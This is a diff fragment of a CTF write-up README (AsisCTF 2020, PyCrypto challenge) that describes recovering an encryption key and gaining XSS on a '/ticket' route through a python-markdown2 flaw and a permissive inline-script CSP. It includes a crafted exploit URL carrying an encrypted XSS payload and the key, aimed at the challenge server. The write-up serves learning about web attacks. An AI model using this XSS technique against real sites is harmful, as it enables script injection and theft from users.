TeamGreyFang/CTF-Writeups/AsisCTF2020/PyCrypto/README.md

 Took its time and gave out the key `ASIS2020_W3bcrypt_ChAlLeNg3!@#%^`

+Inline script tags were allowed on the `/ticket` route meaning our injected payload should work just fine.
-Then using the python-markdown2 vulnerability along with scripts-inline csp allowed us to get XSS. http://76.74.170.201:8080/ticket?msg=1d1758c42e3d973ad815770ad433bdf588d93bc5a40a7c2227879ab1ccbcf5c0af642137d577226fff5dc9dcaec9027b4a731b7c7a87ce3539a5d0c9c41a15c47b10641cd4113e84692f657d877aa04f29ca8d8031f4bea7886b0a3b380da4d0eb9912dbc75f8bfc004b84e24079894387df5ec1f7c1ccc1fa6470491314d60b&key=ASIS2020_W3bcrypt_ChAlLeNg3!%40%23%25^
+Then using the python-markdown2 vulnerability, we make the XSS payload and encrypt it to get our payload.

+http://76.74.170.201:8080/ticket?msg=1d1758c42e3d973ad815770ad433bdf588d93bc5a40a7c2227879ab1ccbcf5c0af642137d577226fff5dc9dcaec9027b4a731b7c7a87ce3539a5d0c9c41a15c47b10641cd4113e84692f657d877aa04f29ca8d8031f4bea7886b0a3b380da4d0eb9912dbc75f8bfc004b84e24079894387df5ec1f7c1ccc1fa6470491314d60b&key=ASIS2020_W3bcrypt_ChAlLeNg3!%40%23%25^

 This is when we came across the line that I just glanced over in the `/ticket` route